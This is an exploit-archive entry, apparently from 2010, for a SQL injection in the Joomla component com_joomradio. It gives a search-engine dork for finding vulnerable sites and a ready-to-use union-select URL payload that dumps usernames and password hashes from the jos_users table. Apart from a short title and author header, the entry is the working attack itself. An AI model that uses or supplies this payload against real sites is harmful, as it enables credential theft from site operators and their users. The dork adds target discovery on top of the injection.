[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_joomradio SQL injection vulnerability
# Published : 2010-04-26
# Author : Mr.tro0oqy
# Previous Title : Uiga Personal Portal index.php (view) SQL Injection
# Next Title : Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability
Joomla Component com_joomradio SQL injection vulnerability
author:Mr.tro0oqy from "community * college"
email:t.4@windowslive.com
greetz:alzomer,Mr.ksoory,my bb ;)
dork: inurl:index.php?option=com_joomradio
exp:
[site]/path/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--